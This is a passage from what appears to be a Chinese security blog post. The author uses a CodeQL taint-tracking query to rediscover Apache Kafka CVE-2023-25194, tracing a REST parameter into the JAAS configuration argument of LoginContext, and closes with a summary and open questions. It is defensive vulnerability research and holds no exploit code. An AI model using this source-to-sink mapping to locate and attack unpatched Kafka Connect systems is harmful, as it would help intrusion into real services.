        this.isSink(node)
        and (
            c instanceof DataFlow::FieldContent
            and c.(DataFlow::FieldContent).getField().getDeclaringType().getASourceSupertype().hasName("Configuration")
            or 
            c instanceof DataFlow::CollectionContent
        )
    )
}

upload successful

小疑问:实际上是两层JaasConfig.configEntries[AppConfigurationEntry],从结果反馈来看这种写法是ok的,写法上实际只有一层,为什么可以?

8.2 Final QL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
/**
 * @kind path-problem
 */

import java
import DataFlow::PathGraph
import semmle.code.java.dataflow.FlowSources


private class JAASSource extends RemoteFlowSource {
    JAASSource(){
        exists( 
            Method m, Annotation a | 
            m.getAParameter() = this.asParameter()
            and m.getFile().getAbsolutePath().matches("%ConnectorsResource.java")
            and a.getType().hasQualifiedName("javax.ws.rs", "Path")
        )
    }
    override string getSourceType() { result = "jaas" }
}

class VulConfig extends TaintTracking::Configuration {
    VulConfig() { this = "jaas vul" }

    override int fieldFlowBranchLimit() { result = 10000000 }

    override predicate isSource(DataFlow::Node src) { src instanceof JAASSource }

    override predicate isSink(DataFlow::Node sink) {
        exists( 
            ConstructorCall cc|
            cc.getConstructor().getDeclaringType().getASupertype*().hasQualifiedName("javax.security.auth.login", "LoginContext")
            and sink.asExpr() = cc.getArgument(3)
            and cc.getNumArgument() = 4
        )
    }

    override predicate isAdditionalTaintStep(DataFlow::Node fromNode, DataFlow::Node toNode) {
        exists(ConstructorCall cc |
            cc.getAnArgument() = fromNode.asExpr()
            and cc = toNode.asExpr()
            and cc.getConstructor().getDeclaringType().hasQualifiedName("java.io", "StreamTokenizer")
        )
        or 
        exists(VarAccess va, ClassOrInterface ci |
            va.getQualifier().getType().getFile() = ci.getFile()
            and ci.getAField().hasName("sval")
            and ci.hasName("StreamTokenizer")
            and va.getVariable().hasName("sval")
            and va = toNode.asExpr()
            and va.getQualifier() = fromNode.asExpr()
        )
        or 
        exists(ConstructorCall cc |
            cc.getAnArgument() = fromNode.asExpr()
            and cc = toNode.asExpr()
            and cc.getConstructor().getDeclaringType().hasQualifiedName("javax.security.auth.login", "AppConfigurationEntry")
        )
        or
        exists(MethodAccess ma |  
            ma.getQualifier() = fromNode.asExpr()
            and ma = toNode.asExpr()
            and ma.getMethod().hasName("getOptions")
            and ma.getQualifier().getType().hasName("AppConfigurationEntry")
        )
    }

    override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
        super.allowImplicitRead(node, c)
        or
        (
            this.isSink(node)
            and (
                c instanceof DataFlow::FieldContent
                and c.(DataFlow::FieldContent).getField().getDeclaringType().getASourceSupertype().hasName("Configuration")
                or 
                c instanceof DataFlow::CollectionContent
            )
        )
    }   
}

from VulConfig config, DataFlow::PathNode source, DataFlow::PathNode sink
where config.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@.", source.getNode(), "user input"

upload successful

0x09 小结

本文尝试使用CodeQL 回溯发现Apache Kafka CVE-2023-25194漏洞,期间遇到了一些问题,一是官方推荐的parittal flow 方式在此并不适合,还不如用Expr.getLocation().getFile()限制文件来得方便;二是隐式链的传播,这块很少有文档,除非看过参考【2】中类似l3yx师傅的案例,或者看ql源码。

CodeQL 不开源,能力有限,若有不对肯请指出,盼师傅们交流。

其实还有些遗留问题

  1. 最终的污点链实际上和真实的调用栈还是有出入的
  2. 4.1.2一节中1+1!=2 也没解释
  3. CVE-2023-25194 ??
    upload successful

0x10 参考

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true